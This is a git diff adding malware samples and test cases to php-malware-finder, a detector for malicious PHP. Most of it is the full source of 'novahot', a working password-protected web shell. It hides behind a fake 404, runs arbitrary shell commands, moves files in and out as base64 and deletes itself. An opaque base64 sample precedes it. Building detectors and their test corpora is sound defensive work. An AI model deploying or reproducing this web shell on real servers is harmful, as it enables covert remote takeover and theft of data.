		26	QX/9g8ZePB9s1wT+cYJkDaUYSSYRN4GwmPzM98cnLzfLuJkx3q2KFbU/TKO9d1oZzp1CXgRqUBKt
		27	fsHQ0iU6ALSN4+qEfP2utYtQQ4JQTS3TSaRqE7d3Lur9agOfNyujjfURKwLqUHF2WLucAEwZB+VK
		28	5pSM0aeBawi1VkpKrdb6mZWc6uPh2dZi/emEkvKOW0JoxIIYEtOQ9fLodPni5GhlcfBo6ajVWz0q
		29	nq8fN7MUVSv1tTSyNcwyBpbCmdIOpw1ldVE/rJeGZP0Yd+uXLEPcWmIri5X9Ok7DvgbQaJBzDEuw
		30	mXQx7Gx1msXio52N6upFJvzG4WkLTchWUNZKYZyTSBKEfHpRL4fnG6Xmcq28iorFesbzdL3Z6U2w
		31	l/cMReYk5N8aa8kEB9zu0J3eqLx2jM7Wryu0XmngrcHuhMgVV1JgRaSP3Ol0VZWPhsulRmsZwJpn
		32	5fpWGupXKn1wlGkbmQoqzW9pVHlav7zK8kW3slE9KMtBK40H3qSgG8VgsDJSpVVUbqiTzTKvAN7l
		33	yQ4qygn5CI67ICxShJrI02FW+qud5gihWqOT8Xv6bCA6zTTeHzhYhLW0zARnaJpb5aizu0ueN6q9
		34	zUr1uhP90HgiGbk8GU0wZWaw1YoSx5mWKm0+D9GovVYedQGur46q9UltDXkbRCCOaQddKQnV6uNB
		35	rV/pbfSvugVpqmLp4Hz/0YQESyqQQAqFKBmeYI3lC1Rb2hz1N/r1o3Jjs5SJuvdsebC21d6YYEAC
		36	SQS25qMQ0bB0bh72mo/WiqPacm+4BZCD0YvN9pPKhELxTkunBPZgvBKlk7NcHJ0tl5TYOO5loRfb
		37	L+tntf0JSnRIByg+Q4Xy0qarebfBn5TQoF+/zjR6yr7Xi9uyXQTMqfuBUxu8MNpLKbkzjwvvYCIi
		38	UqDoDTNIhsLewv2HK+ul4srW48I4h8Le48K4pxT2Zm5/YVxN2QspHlhE7YTXWhqLSWFvdq6g2xwz
		39	qdgThtuICqJw5+Cw3TlsK9LGSsnCXALpdcAWWfBR0IlDxADS/NTR4R0sx+evSSzHV2v23kK+aKYe
		40	vJXwr43EalCZ0nwmD69x+wFe+/vV+kplf3/uTQjSOKMippwiG4DLApr6+eep2yHHp4FbIb9ZQEDd
		41	R+WRYSQG6Hoax5m0mN54Aj0+evhpYYkFMR0Nh93nM/f3tyqNnUrjcXKiUsG7GDmgeJSZ4t7sdx/5
		42	wtczd3/nnfYec6Io/EUR93d+J/HC14XCddLudc+ePn85k2sNZmd/+iSVNz7YQ94KXydLIMEhb75y
		43	EX2M9uanfkkiIhMCQ15BxZNAfC4FvAtSUiQUwZBWwsXdmbn5AmQmHSJHhmiQMwYJO2ZyEfpVSucR
		44	hGCopyCAOwklXrgiBErZqG3sbxU36gsLqaYTqeHg3JFER7mGXR9o5WOklVX7A8eFhwQRG0UE7JBV
		45	52SQGwtyDWIphhFCQfoImBO7AvmlezrsfiShL76YevAbGKgTQoH/Qfez+KMJZSBWa48wdBhmuSSY
		46	XBGaund39t5zToAPj8hKSsJV9q4QDTgybKjAyrxV0oTPyID/EE7Bvgu2nDFQgfXMv9tQwiSV1Ci6
		47	ADsqRCnJlPU/tKE5sKFcHHIs+PjclO7EN1Uzl69f50hPPgI3nC4nAchm5EYZ5hDUhs5K5zMS4nso
		48	drAHaYk0Puprm7hdir9jA6uUKYB5B1PcRCn+IRmTKEgXFYUZEyJcQPN/smYTZOenDgfPugedfr6J
		49	cOpgmGxEASpXG0sDpho7GINhEe4uhrHdNhCf/mr6y1z4X07f/2o653jwLcqdEpwl/Crl+Z5fwJ+s
		50	5G7wzl9yv0kRmPbcgIGC6PFnVHJORk+pJURBJ6TxQyNMRP4qShkkbIvhX8mJu66fW2vzVdSI00zp
		51	gRHt0IfavH0HOHaKASHcYJ6cdm5+7GryeBOJh31tsJmVK2s+xJc4FPUceonTSMLmKrjsGPd2puOn
		52	qJms8sBm03Jq3+EkjZ7AcEGi1uYTff4m7F29PUE4m2/uIDN2CQJkZr/JBw4TYKc/SC1JVER72OBq
		53	yTWFoXx6b/7BW+VMwCBAjjlCxOfoEIkl+M8C+jYf+McF9I57hnB02BvvUNT/CuhzMI93zlvvYMxw
		54	EUfu3Z2DYwhIQtaMdU4RdLVcf/rgmOBwxXryHuLGMAaen297esex0Nh9X97G9GGV/9pB86dJKvdI
		55	CKYCllJrcGKRqdwgg7UQEkvPKQQBQvlsRG6xscpZ6ySyDJwnh+W8UtZSqGpNjXFIof/roTRB9u+h
		56	9L8bSlHWYO79xVPpxAJ9y8GsFTHGUOe8w1mBeoy85pEpjYQnjn9OBWqw4VIrG2D6DtryySMsZ1DL
		57	GOwWijmauw16/Go/naObdwJzqceMJBE70KkVOiILqfxH4qm3sJbChOxgX+kgTPqpN05DzFmhKMS1
		58	oOmnbo7ss+mj2o9emNdMMExA9QriNsjeeU8zfgOfXsmbPD4V4fF7vdzfn5961n3+4tn5TPfHg9P8
		59	nL/79p9HxrWSVUF5cDA4Zm9WOUpIeEdpWk9tTmpCZXRLYjNTdTJYaHdZYW56TEQ3RlE2UnJQbEM0
		60	rAdgIpyl2xtLif9G9VTXbVcXcSMeT+V4ReDHNHXJxQQtpexjv8NfquP2PXaZVn6czpmenU28nGxm
		61	y+ONQw5EDidJs+ziX6si3c7rGr9+N2OlikchMepepQIn+U6k8WtuFJOwBdZEmQXWX4UCbCOIwTBH
		62	EMjHjtlyFDuBNRIIDBRoy0vpjNtDDG4y78w/unf2gwiLibwRyORGAbgvXLdMFPkFudVh1R/mwodl
		63	Bt1aKu3W8kyIcenL0E6b0zHSmPntJAPncvV32ksHLktYVbfFxFRZZBBbljido0zXf5ETCTDyAxVF
		64	qIap11SdVcnaCqKLOdwu0rvQeX/HzKgPgX47H0+aFdJadt4dMGRgcKFTDcLKRlSXayHl7YcyJl5h
		65	ls5U1GeWSJbQGhvC2lhdIA5eG6aloPisU3olALz5PRV2L3uVDUaA+1BdtP+/0Y5UTVpEOlUxcVEC
		66	LMuG/JvbOA4PutniKbRKTRIUUinnSh1btI4ymEUJA7X9h58//Q+Pal3JKjFBzWwacNmkzFQzv3KD
		67	mG9flxzPkXPLMIVTVhVz73nHfTRHfHlHuUkXuxy4rYcluPfXHLEDVeNpRdJLtKzKswEHOyKKocca
		68	muK5XLCaOiXFVwM2KYiy2UXeeJX7QWtK5d+neEnhBb5hLAA1lihAr2R9y4FReBSJYiJYc+GVMuCk
		69	YXDWvuPSYUcB/ztA35t0buyWvSPLkvRe/LGxP1vCA/se1o7A/S1urhgivA+M7483kDAkdR/yconw
		70	J0c3hPQk1QNHCOx5eaSzr5PpyMinhaUg9uzFwPIjrvuKAJiedmrbeePbotF9/fQG56b1PddBeuVv
		71	dlhdN8VPstsSb6ojoTvp1HnvhHZzjso97zXXAfiwWcEdsJaJ5gt8klVOAu/tqCWq9OQVRtrXV7Xz
		72	7Cr1DZmmf1C/0A6ACqjy4ArUaW4S1eXhOYjd629jmphkP3zm7x0o9c1PjPpa+5umkf+/T87S+67f
		73	DldivnXVk/1Ce4BaBUr98Frd9CdNw9MJIwEos6CrgUwqxKCDlT2o50g9lCy53/X1+28awvDdGjf0
		74	vqZx4/xfETz+swxjWkwrwfMUPs5xuFFAJFESTEWGZL/3C44pT8DwOgXcVRMMTAYEflRhnjL9Iuqh
		75	oFiw8KFBTjSQa+2P5uQrlzMggBl2rl72oS6mru8ad2QnQmngadsBQAwOqKYCa2Awep08EKR8ppFB
		76	YTKY7Geso8iShLmL/QXbtCswu8Tv+SDbrGc99l94uC6J


diff --git a/php-malware-finder/samples/real/novahot.php b/php-malware-finder/samples/real/novahot.php new file mode 100644 index 0000000..a330580 --- /dev/null +++ b/php-malware-finder/samples/real/novahot.php
@@ -0,0 +1,130 @@
		1	<?php
		2
		3	# Tested on PHP 5.4.45 on Debian Wheezy.
		4	#
		5	# To test this trojan locally, run the following in the directory containing
		6	# this file:
		7	# php -S localhost:<port>
		8
		9	# TODO: Change this password. Don't leave the default!
		10	define('PASSWORD', 'the-password');
		11
		12	# Override the default error handling to:
		13	# 1. Bludgeon PHP `throw`-ing rather than logging errors
		14	# 2. Keep noise out of the error logs
		15	set_error_handler('warning_handler', E_WARNING);
		16	function warning_handler($errno, $errstr) {
		17	throw new ErrorException($errstr);
		18	}
		19
		20	# get the POSTed JSON input
		21	$post = json_decode(file_get_contents('php://input'), true);
		22	$cwd = ($post['cwd'] !== '') ? $post['cwd'] : getcwd();
		23
		24	# feign non-existence if the authentication is invalid
		25	if (!isset($post['auth']) \|\| $post['auth'] !== PASSWORD) {
		26	header('HTTP/1.0 404 Not Found');
		27	die();
		28	}
		29
		30	# return JSON to the client
		31	header('content-type: application/json');
		32
		33	# if `cmd` is a trojan payload, execute it
		34	if (function_exists($post['cmd'])) {
		35	$post['cmd']($cwd, $post['args']);
		36	}
		37
		38	# otherwise, execute a shell command
		39	else {
		40	$output = [];
		41
		42	# execute the command
		43	$cmd = "cd $cwd; {$post['cmd']} 2>&1; pwd";
		44	exec($cmd, $output);
		45	$cwd = array_pop($output);
		46
		47	$response = [
		48	'stdout' => $output,
		49	'stderr' => [],
		50	'cwd' => $cwd,
		51	];
		52
		53	die(json_encode($response));
		54	}
		55
		56
		57	# File-download payload
		58	function payload_download ($cwd, $args) {
		59
		60	# cd to the trojan's cwd
		61	chdir($cwd);
		62
		63	# open the file as binary, and base64-encode its contents
		64	try {
		65	$stdout = base64_encode(file_get_contents($args['file']));
		66	$stderr = [];
		67	}
		68
		69	# notify the client on failure
		70	catch (ErrorException $e) {
		71	$stdout = [];
		72	$stderr = [ 'Could not download file.', $e->getMessage() ];
		73	}
		74
		75	die(json_encode([
		76	'stdout' => $stdout,
		77	'stderr' => $stderr,
		78	'cwd' => $cwd,
		79	]));
		80	}
		81
		82	# File-upload payload
		83	function payload_upload ($cwd, $args) {
		84
		85	# cd to the trojan's cwd
		86	chdir($cwd);
		87
		88	# base64-decode the uploaded bytes, and write them to a file
		89	try {
		90	file_put_contents( $args['dst'], base64_decode($args['data']));
		91	$stderr = [];
		92	$stdout = [ "File saved to {$args['dst']}." ];
		93	}
		94
		95	# notify the client on failure
		96	catch (ErrorException $e) {
		97	$stdout = [];
		98	$stderr = [ 'Could not save file.', $e->getMessage() ];
		99	}
		100
		101	die(json_encode([
		102	'stdout' => $stdout,
		103	'stderr' => $stderr,
		104	'cwd' => $cwd,
		105	]));
		106	}
		107
		108	# Trojan autodestruct
		109	function payload_autodestruct ($cwd, $args) {
		110
		111	# attempt to delete the trojan
		112	try {
		113
		114	unlink(__FILE__);
		115	$stdout = [ 'File ' . __FILE__ . ' has autodestructed.' ];
		116	$stderr = [];
		117	}
		118
		119	# notify the client on failure
		120	catch (ErrorException $e) {
		121	$stdout = [];
		122	$stderr = [ 'File ' . __FILE__ . ' could not autodestruct.'];
		123	}
		124
		125	die(json_encode([
		126	'stdout' => [ 'Instructed ' . __FILE__ . ' to autodestruct.' ],
		127	'stderr' => [],
		128	'cwd' => $cwd,
		129	]));
		130	}


diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh index 6928e65..c973196 100755 --- a/php-malware-finder/tests.sh +++ b/php-malware-finder/tests.sh
@@ -90,6 +90,9 @@ run_test artificial/bypasses.php "0x132:\$var_as_func: \$_POST\['funct'\]("
90		90
91	# real	91	# real
92	run_test real/sucuri_2014_04.php '0x67:$execution3:'	92	run_test real/sucuri_2014_04.php '0x67:$execution3:'
		93	run_test real/novahot.php 'DodgyStrings'
		94	run_test real/guidtz.php '0x12d8:$non_printables:'
		95	run_test real/guidtz.php 'NonPrintableChars'
93		96
94	# Asp files	97	# Asp files
95	run_test_asp classic/cmdasp.asp 'DodgyStrings'	98	run_test_asp classic/cmdasp.asp 'DodgyStrings'